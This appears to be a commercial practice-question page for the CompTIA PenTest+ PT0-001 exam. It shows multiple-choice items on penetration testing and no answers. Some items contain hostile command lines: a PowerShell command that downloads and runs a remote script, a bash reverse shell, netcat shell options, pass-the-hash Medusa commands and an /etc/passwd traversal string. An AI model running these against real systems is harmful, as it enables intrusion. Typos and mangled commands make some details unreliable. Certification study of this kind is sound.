New Year Special Sale - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: spcl70

Note! PT0-001 has been withdrawn. The new exam code is PT0-002

Practice Free PT0-001 CompTIA PenTest+ Exam Exam Questions Answers With Explanation

We at Crack4sure are committed to giving students who are preparing for the CompTIA PT0-001 Exam the most current and reliable questions . To help people study, we've made some of our CompTIA PenTest+ Exam exam materials available for free to everyone. You can take the Free PT0-001 Practice Test as many times as you want. The answers to the practice questions are given, and each answer is explained.

Get Full 294 Questions Search Other CompTIA Exam
Question # 6

A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443 The penetration tester observes the following output:

PT0-001 question answer

Which of the following has MOST likely occurred?

A.

The scan results were a false positive.

B.

The IPS is blocking traffic to port 443

C.

A mismatched firewall rule is blocking 443.

D.

The organization moved services to port 8443

Question # 7

A penetration tester is attempting to scan a legacy web application using the scanner's default scan settings. The scans continually result in the application becoming unresponsive. Which of the following can help to alleviate this issue?

A.

Packet shaping

B.

Flow control

C.

Bandwidth limits

D.

Query throttling

Question # 8

Which of the following BEST describes why an MSA is helpful?

A.

It contractually binds both parties to not disclose vulnerabilities.

B.

It reduces potential for scope creep.

C.

It clarifies the business arrangement by agreeing to specific terms.

D.

It defines the timelines for the penetration test.

Question # 9

A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?

A.

Openssl s_client -tls1_2 -connect 127.212.31.17:443

B.

Openssl s_client -ss12 -connect 127.212.31.17:443

C.

Openssl s_client -ss13 -connect 127.212.31.17:443

D.

Openssl s_server -tls1_2 -connect 127.212.31.17:443

Question # 10

Which of the following would BEST prevent fence jumping at a facility?

A.

Install proper lighting around the perimeter of the facility.

B.

Decrease the distance between the links in the fence.

C.

Add a top guard on the fence that faces away from the facility.

D.

Place video cameras that are angled toward the fence.

Question # 11

During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

PT0-001 question answer

Which of the following Medusa commands would potentially provide better results?

A.

#medusa -h hosts.txt -U usera.txt -P hashes, txt -M smbnt. -m GROP:LOCAL -O out.txt -m PASS:HASH

B.

#medusa -H hosts.txt -U users, txt -P hashes, txt -M smbnt -m PASS:HASH -o out. txt

C.

#medusa -H hosts.txt -u WrkStnAdmin -p aa3b435b51404eeaa3b435b51404ee:4e63c1b137e274dda214154b349fe316 -M smbnt -m GROUP:DOMAIN -o out.txt

D.

#medusa -H hosts.txt -C creds.txt -M mssq1 -m GROUP: DOMAIN -o out.txt

Question # 12

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.

Question # 13

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)

A.

-O

B.

-iL

C.

-sV

D.

-sS

E.

-oN

F.

-oX

Question # 14

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is

indicative of an error-based SQL injection attack?

A.

a=1 or 1––

B.

1=1 or b––

C.

1=1 or 2––

D.

1=1 or a––

Question # 15

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/

script.ps1”);Invoke-Cmdlet

Which of the following BEST describes the actions performed this command?

A.

Set the execution policy

B.

Execute a remote script

C.

Run an encoded command

D.

Instantiate an object

Question # 16

During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:

c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

A.

Hierarchical file system

B.

Alternate data streams

C.

Backdoor success

D.

Extended file system

Question # 17

A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A.

Document Ihe findtngs with an executive summary, recommendations, and screenshots of the web apphcation disclosure.

B.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.

C.

Notify the development team of the discovery and suggest that input validation be implemented on the web application's SQL query strings.

D.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

Question # 18

Which of the following BEST describes the difference between a red team engagement and a penetration test?

A.

A penetration test has a broad scope and emulates advanced persistent threats while a red team engagement has a limited scope and focuses more on vulnerability identification

B.

A red team engagement has a broad scope and emulates advanced persistent threats, while a penetration test has a limited scope and focuses more on vulnerability identification

C.

A red team engagement has a broad scope and focuses more on vulnerability identification, while a penetration test has a limited scope and emulates advanced persistent threats

D.

A penetration test has a broad scope and focuses more on vulnerability identification while a red team engagement has a limited scope and emulates advanced persistent threats

Question # 19

Which of the following types of physical security attacks does a mantrap mitigate-?

A.

Lock picking

B.

Impersonation

C.

Shoulder surfing

D.

Tailgating

Question # 20

In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

A.

Brute force the user's password.

B.

Perform an ARP spoofing attack.

C.

Leverage the BeEF framework to capture credentials.

D.

Conduct LLMNR/NETBIOS-ns poisoning.

Question # 21

A penetration tester must assess a web service. Which of the following should the tester request during the scoping phase?

A.

XSD

B.

After-hours contact escalation

C.

WSDLfile

D.

SOAP project file

Question # 22

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

A.

Karma

B.

Kismet

C.

Pixie

D.

NetStumbler

Question # 23

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be

the NEXT action?

A.

Disable the network port of the affected service.

B.

Complete all findings, and then submit them to the client.

C.

Promptly alert the client with details of the finding.

D.

Take the target offline so it cannot be exploited by an attacker.

Question # 24

Prior to a security assessment of a company's user population via spear phishing, which of the following is the MOST appropriate method to de-escalate any incidents or consequences?

A.

Determine the appropriate format and content of the spear-phishing emails.

B.

Send follow-up communication to spear-phishing targets to notify of the assessment.

C.

Carefully prioritize the list of targeted users, excluding high value targets.

D.

Provide limited but necessary communication prior to the assessment.

Question # 25

Which of the following commands starts the Metasploit database?

A.

msfconsole

B.

workspace

C.

msfvenom

D.

db_init

E.

db_connect

Question # 26

A penetration tester has gained physical access to a facility and connected directly into the internal network.

The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

A.

Spoofing a printer’s MAC address

B.

Abusing DTP negotiation

C.

Performing LLMNR poisoning

D.

Conducting an STP attack

Question # 27

A recent vulnerability scan of all web servers in an environment offers the following results:

PT0-001 question answer

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

A.

Unrestricted file upload, clickjacking, verbose server banner, SQL injection

B.

Unrestricted file upload, SQL injection, clickjacking, verbose server banner

C.

Clickjacking, unrestricted file upload, verbose server banner, SQL injection

D.

SQL injection, unrestricted file upload, clickjacking, verbose server banner

E.

SQL injection, clickjacking, unrestricted file upload, verbose server banner

Question # 28

A penetration tester ran the following Nmap scan on a computer:

nmap -aV 192.168.1.5

The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

A.

The organization failed to disable Telnet.

B.

Nmap results contain a false positive for port 23.

C.

Port 22 was filtered.

D.

The service is running on a non-standard port.

Question # 29

During a penetration test a tester Identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

A.

Shell binary placed in C \windowsttemp

B.

Modified daemons

C.

New user creation

D.

Backdoored executaWes

Question # 30

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

A.

LSASS

B.

SAM database

C.

Active Directory

D.

Registry

Question # 31

A client’s systems administrator requests a copy of the report from the penetration tester, but the systems

administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester’s

BEST course of action?

A.

Send the report since the systems administrator will be in charge of implementing the fixes.

B.

Send the report and carbon copy the point of contact/signatory for visibility.

C.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

D.

Forward the request to the point of contact/signatory for authorization.

Question # 32

Which of the following has a direct and significant impact on the budget of the security assessment?

A.

Scoping

B.

Scheduling

C.

Compliance requirement

D.

Target risk

Question # 33

Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

A.

Badge cloning

B.

Lock picking

C.

Tailgating

D.

Piggybacking

Question # 34

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration

Question # 35

A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant recommend be implemented?

A.

Strong password policy

B.

Password encryption

C.

Email system hardening

D.

Two-factor authentication

Question # 36

A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

A.

To allow another security consultant access to the shell

B.

To allow the developer to troubleshoot the vulnerability

C.

To allow the systems administrator to perform the cleanup

D.

To allow the systems administrator to write a rule on the WAF

Question # 37

A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

A.

Redirect the user with a CSRF.

B.

Launch the website in an iFRAME.

C.

Pull server headers.

D.

Capture and replay a session ID.

Question # 38

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometnc device duplicated a valid user's fingerpnnt.

Question # 39

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr –xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

A.

Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

B.

Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path “/home/user’. Then run changepass

C.

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

D.

Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’

Question # 40

A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A.

nc -nlvp 443

B.

nc 10.2.4.6. 443

C.

nc -w3 10.2.4.6 443

D.

nc -e /bin/sh 10.2.4.6. 443

Question # 41

A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

A.

Interrogation

B.

Elicitation

C.

Impersonation

D.

Spear phishing

Question # 42

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A.

Infrastructure is being replaced with similar hardware and software.

B.

Systems administrators are applying the wrong patches.

C.

The organization is not taking action to remediate identified findings.

D.

The penetration testing tools were misconfigured.

Question # 43

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A.

nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B.

nslookup -ns 8.8.8.8 << dnslist.txt

C.

for x in (1…254); do dig -x 192.168. $x. $x; done

D.

dig -r > echo “8.8.8.8” >> /etc/resolv/conf

Question # 44

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing

application. Which of the following would be the BEST remediation strategy?

A.

Enable HTTP Strict Transport Security.

B.

Enable a secure cookie flag.

C.

Encrypt the communication channel.

D.

Sanitize invalid user input.